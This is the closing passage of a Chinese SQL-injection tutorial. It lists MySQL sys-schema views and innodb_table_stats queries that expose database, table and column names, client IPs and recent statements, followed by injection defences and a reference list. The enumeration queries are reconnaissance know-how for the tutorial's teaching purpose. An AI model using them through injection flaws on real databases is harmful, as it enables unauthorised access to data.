SELECT user,db,command,current_statement,last_statement,time FROM sys.session;
#查看所有曾连接数据库的IP,总连接次数
SELECT host,total_connections FROM sys.host_summary;
节选自:Mysql的奇淫技巧(黑科技)
视图->列名 说明
host_summary -> host、total_connections 历史连接IP、对应IP的连接次数
innodb_buffer_stats_by_schema -> object_schema 库名
innodb_buffer_stats_by_table -> object_schema、object_name 库名、表名(可指定)
io_global_by_file_by_bytes -> file 路径中包含库名
io_global_by_file_by_latency -> file 路径中包含库名
processlist -> current_statement、last_statement 当前数据库正在执行的语句、该句柄执行的上一条语句
schema_auto_increment_columns -> table_schema、table_name、column_name 库名、表名、列名
schema_index_statistics -> table_schema、table_name 库名、表名
schema_object_overview -> db 库名
schema_table_statistics -> table_schema、table_name 库名、表名
schema_table_statistics_with_buffer -> table_schema、table_name 库名、表名
schema_tables_with_full_table_scans -> object_schema、object_name 库名、表名(全面扫描访问)
session -> current_statement、last_statement 当前数据库正在执行的语句、该句柄执行的上一条语句
statement_analysis -> query、db 数据库最近执行的请求、对于请求访问的数据库名
statementswith* -> query、db 数据库最近执行的特殊情况的请求、对应请求的数据库
version -> mysql_version mysql版本信息
x$innodb_buffer_stats_by_schema 同innodb_buffer_stats_by_schema
x$innodb_buffer_stats_by_table 同innodb_buffer_stats_by_table
x$io_global_by_file_by_bytes 同io_global_by_file_by_bytes
…… 同……
x$schema_flattened_keys -> table_schema、table_name、index_columns 库名、表名、主键名
x$ps_schema_table_statistics_io -> table_schema、table_name、count_read 库名、表名、读取该表的次数
还有就是mysql数据库也可以查询表名、库名。
1
2
select table_name from mysql.innodb_table_stats where database_name=database();
select table_name from mysql.innodb_index_stats where database_name=database();

0x20.Mysql注入防御

  • 单引号闭合可控变量,并进行相应的转义处理
  • 尽量使用预编译来执行SQL语句
  • 采用白名单机制/完善黑名单
  • 安装WAF防护软件
  • 拒绝不安全的编码转换,尽量统一编码
  • 关闭错误提示

0x21.结语

东西有点多,可能要慢慢吸收。

0x22.参考

【PHP代码审计】入门之路——第二篇-宽字节注入
MySQL注入技巧
Mysql 注入基础小结
Mysql的奇淫技巧(黑科技)
Read MySQL Client’s File
Dnslog在SQL注入中的实战
从安全角度深入理解MySQL编码转换机制
mysql sys Schema Object Index
对MYSQL注入相关内容及部分Trick的归类小结